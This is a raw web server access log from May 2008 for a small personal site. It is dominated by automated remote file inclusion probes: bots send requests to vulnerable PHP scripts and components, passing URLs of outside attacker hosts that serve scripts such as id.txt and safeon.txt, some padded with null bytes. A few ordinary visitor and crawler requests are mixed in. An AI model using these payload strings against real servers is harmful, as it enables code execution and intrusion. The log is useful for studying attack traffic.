208.116.44.68 - - [07/May/2008:11:16:09 -0500] "GET /logs//errors.php?error=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.812"
64.38.46.234 - - [07/May/2008:11:22:30 -0500] "GET /logs/access_log.1207785600/admin/editor2/spaw_control.class.php?spaw_root=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
64.38.46.234 - - [07/May/2008:11:22:30 -0500] "GET /logs/access_log.1207785600/admin/editor2/spaw_control.class.php?spaw_root=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
64.38.46.234 - - [07/May/2008:11:22:30 -0500] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
64.38.46.234 - - [07/May/2008:11:22:30 -0500] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
64.38.46.234 - - [07/May/2008:11:22:30 -0500] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
64.38.46.234 - - [07/May/2008:11:22:30 -0500] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
66.225.229.167 - - [07/May/2008:11:26:33 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://8-p.ru/components/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
66.225.229.167 - - [07/May/2008:11:26:33 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://8-p.ru/components/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
64.38.46.234 - - [07/May/2008:11:27:24 -0500] "GET /logs/access_log.1207785600/admin/editor2/spaw_control.class.php?spaw_root=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
64.38.46.234 - - [07/May/2008:11:27:25 -0500] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
64.38.46.234 - - [07/May/2008:11:27:25 -0500] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
63.246.154.12 - - [07/May/2008:11:28:39 -0500] "GET /logs/access_log.1207785600/skin/zero_vote/error.php?dir=http://xxxflicks.tv/passwords/photos/prc.gif? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
63.246.154.12 - - [07/May/2008:11:28:40 -0500] "GET /skin/zero_vote/error.php?dir=http://xxxflicks.tv/passwords/photos/prc.gif? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
63.246.154.12 - - [07/May/2008:11:28:40 -0500] "GET /logs/skin/zero_vote/error.php?dir=http://xxxflicks.tv/passwords/photos/prc.gif? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
64.15.152.77 - - [07/May/2008:11:29:01 -0500] "GET /logs/access_log.1207785600/skin/zero_vote/error.php?dir=http://xxxflicks.tv/passwords/photos/prc.gif? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
64.15.152.77 - - [07/May/2008:11:29:01 -0500] "GET /skin/zero_vote/error.php?dir=http://xxxflicks.tv/passwords/photos/prc.gif? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
64.15.152.77 - - [07/May/2008:11:29:01 -0500] "GET /logs/skin/zero_vote/error.php?dir=http://xxxflicks.tv/passwords/photos/prc.gif? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
217.172.175.130 - - [07/May/2008:11:29:13 -0500] "GET /logs//include.php?path[docroot]=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.69"
217.172.175.130 - - [07/May/2008:11:29:13 -0500] "GET //include.php?path[docroot]=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.69"
207.7.108.240 - - [07/May/2008:11:29:31 -0500] "GET /logs/access_log.1207785600/skin/zero_vote/error.php?dir=http://xxxflicks.tv/passwords/photos/prc.gif? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
207.7.108.240 - - [07/May/2008:11:29:31 -0500] "GET /skin/zero_vote/error.php?dir=http://xxxflicks.tv/passwords/photos/prc.gif? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
207.7.108.240 - - [07/May/2008:11:29:32 -0500] "GET /logs/skin/zero_vote/error.php?dir=http://xxxflicks.tv/passwords/photos/prc.gif? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
62.75.158.23 - - [07/May/2008:11:29:49 -0500] "GET /logs//include.php?path[docroot]=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.69"
62.75.158.23 - - [07/May/2008:11:29:49 -0500] "GET //include.php?path[docroot]=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.69"
74.6.9.24 - - [07/May/2008:11:30:57 -0500] "GET /logs/access_log.1182729600 HTTP/1.0" 200 229219 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.97.203.110 - - [07/May/2008:11:33:33 -0500] "GET /index.php?var=http://www.zimbaligolfestate.co.za/administrator/templates/mambo??? HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
209.97.203.110 - - [07/May/2008:11:33:33 -0500] "GET /logs/index.php?var=http://www.zimbaligolfestate.co.za/administrator/templates/mambo??? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
83.189.175.160 - - [07/May/2008:11:35:13 -0500] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xxxflicks.tv/passwords/photos/prc.gif? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
83.189.175.160 - - [07/May/2008:11:35:13 -0500] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xxxflicks.tv/passwords/photos/prc.gif? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.177.16.141 - - [07/May/2008:11:35:49 -0500] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xxxflicks.tv/passwords/photos/prc.gif? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.177.16.141 - - [07/May/2008:11:35:50 -0500] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xxxflicks.tv/passwords/photos/prc.gif? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.177.16.141 - - [07/May/2008:11:35:50 -0500] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xxxflicks.tv/passwords/photos/prc.gif? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.177.16.141 - - [07/May/2008:11:35:50 -0500] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xxxflicks.tv/passwords/photos/prc.gif? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
84.40.22.92 - - [07/May/2008:11:35:57 -0500] "GET /logs/access_log.1207008000//stubjambo.php?baseDir=http://www.guardmusic.com/echo.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
84.40.22.92 - - [07/May/2008:11:35:57 -0500] "GET /logs//stubjambo.php?baseDir=http://www.guardmusic.com/echo.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
217.67.26.84 - - [07/May/2008:11:36:55 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_pathftp://128.175.10.3/incoming/smile03.jpg?? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
217.67.26.84 - - [07/May/2008:11:36:55 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_pathftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
217.67.26.84 - - [07/May/2008:11:36:55 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_pathftp://128.175.10.3/incoming/smile03.jpg?? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
217.67.26.84 - - [07/May/2008:11:36:55 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_pathftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
84.40.22.92 - - [07/May/2008:11:38:05 -0500] "GET /logs/access_log.1207785600//stubjambo.php?baseDir=http://www.guardmusic.com/echo.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
64.38.46.234 - - [07/May/2008:11:38:31 -0500] "GET /logs/access_log.1207785600/admin/editor2/spaw_control.class.php?spaw_root=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
64.38.46.234 - - [07/May/2008:11:38:31 -0500] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
64.38.46.234 - - [07/May/2008:11:38:31 -0500] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
58.26.137.64 - - [07/May/2008:11:51:07 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://medisana.co.kr/test?? HTTP/1.1" 404 335 "-""libwww-perl/5.69"
67.15.58.22 - - [07/May/2008:11:52:11 -0500] "GET /logs//data//faqsupport/samplefaqsupport.php=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 367 "-""libwww-perl/5.811"
67.15.58.22 - - [07/May/2008:11:52:11 -0500] "GET //data//faqsupport/samplefaqsupport.php=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 362 "-""libwww-perl/5.811"
58.26.137.64 - - [07/May/2008:11:55:10 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://medisana.co.kr/test?? HTTP/1.1" 404 335 "-""libwww-perl/5.69"
74.6.28.124 - - [07/May/2008:11:56:51 -0500] "GET /logs/access_log.1206144000 HTTP/1.0" 200 215248 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.214.26.250 - - [07/May/2008:11:56:57 -0500] "GET /logs//data//faqsupport/samplefaqsupport.php=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 367 "-""libwww-perl/5.69"
85.214.26.250 - - [07/May/2008:11:56:58 -0500] "GET //data//faqsupport/samplefaqsupport.php=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 362 "-""libwww-perl/5.69"
217.16.16.208 - - [07/May/2008:12:00:35 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://h1.ripway.com/danilo1234/aa1122.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.803"
217.16.16.208 - - [07/May/2008:12:00:36 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://h1.ripway.com/danilo1234/aa1122.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.803"
217.16.16.208 - - [07/May/2008:12:00:39 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://h1.ripway.com/danilo1234/aa1122.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.803"
217.16.16.208 - - [07/May/2008:12:00:39 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://h1.ripway.com/danilo1234/aa1122.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.803"
202.179.180.41 - - [07/May/2008:12:00:55 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)"
202.179.180.41 - - [07/May/2008:12:00:56 -0500] "GET / HTTP/1.1" 200 1243 "-""Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)"
124.43.57.224 - - [07/May/2008:12:03:44 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_%28tattoo%29""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
124.43.57.224 - - [07/May/2008:12:03:45 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
124.43.57.224 - - [07/May/2008:12:03:45 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
198.22.123.104 - - [07/May/2008:12:08:23 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www5.google.com/search?hl=en&q=vintage+tattoo&ei=9-AhSN6vOJOoiAH88tyBCg&redir_esc=www5""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
198.22.123.104 - - [07/May/2008:12:08:23 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
198.22.123.104 - - [07/May/2008:12:08:23 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
217.210.225.185 - - [07/May/2008:12:13:38 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.se/search?hl=sv&q=tattoo+vintage&meta=""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
217.210.225.185 - - [07/May/2008:12:13:38 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
217.210.225.185 - - [07/May/2008:12:13:38 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
217.210.225.185 - - [07/May/2008:12:13:39 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
202.60.74.190 - - [07/May/2008:12:14:49 -0500] "GET /logs//admin.php?include_path=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
202.60.74.190 - - [07/May/2008:12:14:49 -0500] "GET //admin.php?include_path=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.245.149.155 - - [07/May/2008:12:16:07 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 321 "-""Mozilla/5.0"
87.245.149.155 - - [07/May/2008:12:17:32 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 321 "-""Mozilla/5.0"
207.150.191.64 - - [07/May/2008:12:19:36 -0500] "GET /logs/access_log.1207785600/skin/zero_vote/error.php?dir=http://xxxflicks.tv/passwords/photos/prc.gif? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
207.150.191.64 - - [07/May/2008:12:19:37 -0500] "GET /skin/zero_vote/error.php?dir=http://xxxflicks.tv/passwords/photos/prc.gif? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
207.150.191.64 - - [07/May/2008:12:19:37 -0500] "GET /logs/skin/zero_vote/error.php?dir=http://xxxflicks.tv/passwords/photos/prc.gif? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
64.128.80.102 - - [07/May/2008:12:21:59 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
64.128.80.102 - - [07/May/2008:12:21:59 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
84.16.224.119 - - [07/May/2008:12:23:17 -0500] "GET /logs/access_log.1207785600//usr/sbin/httpd%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00http://www.timeplusmag.com/dynamicpoll/polldata/README.txt HTTP/1.1" 404 326 "-""libwww-perl/5.79"
84.16.224.119 - - [07/May/2008:12:23:17 -0500] "GET //usr/sbin/httpd%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00http://www.timeplusmag.com/dynamicpoll/polldata/README.txt HTTP/1.1" 404 299 "-""libwww-perl/5.79"
84.16.224.119 - - [07/May/2008:12:23:17 -0500] "GET /logs//usr/sbin/httpd%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00http://www.timeplusmag.com/dynamicpoll/polldata/README.txt HTTP/1.1" 404 304 "-""libwww-perl/5.79"
82.104.53.93 - - [07/May/2008:12:24:05 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://8-p.ru/components/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
82.104.53.93 - - [07/May/2008:12:24:59 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://8-p.ru/components/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
82.104.53.93 - - [07/May/2008:12:25:01 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://8-p.ru/components/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
82.77.9.141 - - [07/May/2008:12:27:14 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
82.77.9.141 - - [07/May/2008:12:27:14 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
72.30.179.224 - - [07/May/2008:12:29:06 -0500] "GET /logs/access_log.1191024000 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.15.58.22 - - [07/May/2008:12:30:44 -0500] "GET /logs/access_log.1207008000//data//faqsupport/samplefaqsupport.php=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 389 "-""libwww-perl/5.811"
67.15.58.22 - - [07/May/2008:12:30:44 -0500] "GET //data//faqsupport/samplefaqsupport.php=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 362 "-""libwww-perl/5.811"
67.15.58.22 - - [07/May/2008:12:30:44 -0500] "GET /logs//data//faqsupport/samplefaqsupport.php=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 367 "-""libwww-perl/5.811"
189.11.126.17 - - [07/May/2008:12:31:11 -0500] "GET /logs//include.php?path[docroot]=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
189.11.126.17 - - [07/May/2008:12:31:11 -0500] "GET //include.php?path[docroot]=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
85.214.26.250 - - [07/May/2008:12:31:34 -0500] "GET /logs/access_log.1207785600//data//faqsupport/samplefaqsupport.php=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 389 "-""libwww-perl/5.69"
85.214.26.250 - - [07/May/2008:12:31:34 -0500] "GET //data//faqsupport/samplefaqsupport.php=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 362 "-""libwww-perl/5.69"
85.214.26.250 - - [07/May/2008:12:31:35 -0500] "GET /logs//data//faqsupport/samplefaqsupport.php=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 367 "-""libwww-perl/5.69"
84.16.224.119 - - [07/May/2008:12:31:57 -0500] "GET /logs/access_log.1207785600//admin.php?include_path=http://www.kulturystyka.org.pl/modules/xoopstube/images/robots.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
84.16.224.119 - - [07/May/2008:12:31:58 -0500] "GET //admin.php?include_path=http://www.kulturystyka.org.pl/modules/xoopstube/images/robots.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
84.16.224.119 - - [07/May/2008:12:31:58 -0500] "GET /logs//admin.php?include_path=http://www.kulturystyka.org.pl/modules/xoopstube/images/robots.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
89.149.208.203 - - [07/May/2008:12:33:18 -0500] "GET /logs/access_log.1207785600//admin.php?include_path=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
89.149.208.203 - - [07/May/2008:12:33:18 -0500] "GET //admin.php?include_path=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
89.149.208.203 - - [07/May/2008:12:33:19 -0500] "GET /logs//admin.php?include_path=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
67.15.58.22 - - [07/May/2008:12:38:01 -0500] "GET /logs/access_log.1207785600//data//faqsupport/samplefaqsupport.php=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 389 "-""libwww-perl/5.811"
66.249.67.199 - - [07/May/2008:12:39:27 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
64.139.33.188 - - [07/May/2008:12:40:05 -0500] "GET /logs//usr/sbin/httpd%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00http://www.thecurseoftheinternetgods.com/articlesparkblog/wp-content/themes/id.txt HTTP/1.1" 404 304 "-""libwww-perl/5.805"
64.139.33.188 - - [07/May/2008:12:40:07 -0500] "GET //usr/sbin/httpd%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00http://www.thecurseoftheinternetgods.com/articlesparkblog/wp-content/themes/id.txt HTTP/1.1" 404 299 "-""libwww-perl/5.805"
202.60.74.190 - - [07/May/2008:12:40:44 -0500] "GET /logs/access_log.1207785600//admin.php?include_path=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
202.60.74.190 - - [07/May/2008:12:40:45 -0500] "GET //admin.php?include_path=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
202.60.74.190 - - [07/May/2008:12:40:45 -0500] "GET /logs//admin.php?include_path=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
66.80.93.168 - - [07/May/2008:12:42:03 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.autodelen.net/beelden/succes?? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
66.80.93.168 - - [07/May/2008:12:42:04 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.autodelen.net/beelden/succes?? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
193.7.171.72 - - [07/May/2008:12:44:07 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
193.7.171.72 - - [07/May/2008:12:44:07 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
58.26.137.64 - - [07/May/2008:12:44:10 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 333 "-""libwww-perl/5.69"
58.26.137.64 - - [07/May/2008:12:44:11 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 328 "-""libwww-perl/5.69"
74.6.17.174 - - [07/May/2008:12:47:56 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.29.182 - - [07/May/2008:12:47:57 -0500] "GET /costume/ HTTP/1.0" 200 640 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.26.88 - - [07/May/2008:12:53:55 -0500] "GET /logs/?D=D HTTP/1.0" 200 82454 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.16.190 - - [07/May/2008:13:00:34 -0500] "GET /logs/access_log.1188950400 HTTP/1.0" 200 194447 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
82.77.9.141 - - [07/May/2008:13:00:38 -0500] "GET /logs//?pag=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 200 82611 "-""libwww-perl/5.803"
82.77.9.141 - - [07/May/2008:13:00:43 -0500] "GET //?pag=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
64.139.33.188 - - [07/May/2008:13:02:39 -0500] "GET /logs/access_log.1207785600//usr/sbin/httpd%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00http://www.thecurseoftheinternetgods.com/articlesparkblog/wp-content/themes/id.txt HTTP/1.1" 404 326 "-""libwww-perl/5.805"
64.139.33.188 - - [07/May/2008:13:02:40 -0500] "GET //usr/sbin/httpd%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00http://www.thecurseoftheinternetgods.com/articlesparkblog/wp-content/themes/id.txt HTTP/1.1" 404 299 "-""libwww-perl/5.805"
64.139.33.188 - - [07/May/2008:13:02:40 -0500] "GET /logs//usr/sbin/httpd%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00http://www.thecurseoftheinternetgods.com/articlesparkblog/wp-content/themes/id.txt HTTP/1.1" 404 304 "-""libwww-perl/5.805"
85.92.71.151 - - [07/May/2008:13:08:42 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.onyxclub.ru/administrator/components/com_remository/idf.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
85.92.71.151 - - [07/May/2008:13:08:42 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.onyxclub.ru/administrator/components/com_remository/idf.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
82.102.10.26 - - [07/May/2008:13:12:29 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://vps.istri.info/manual/secure.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
82.102.10.26 - - [07/May/2008:13:12:29 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://vps.istri.info/manual/secure.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
74.6.24.234 - - [07/May/2008:13:14:44 -0500] "GET /logs/access_log.1179878400 HTTP/1.0" 200 120274 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
193.7.171.72 - - [07/May/2008:13:17:55 -0500] "GET /logs//?pag=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 200 82611 "-""libwww-perl/5.65"
193.7.171.72 - - [07/May/2008:13:17:59 -0500] "GET //?pag=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.65"
85.25.145.85 - - [07/May/2008:13:19:02 -0500] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.i-promo.info/test.txt? HTTP/1.1" 404 316 "-""Mozilla/4.61 (Macintosh; I; PPC)"
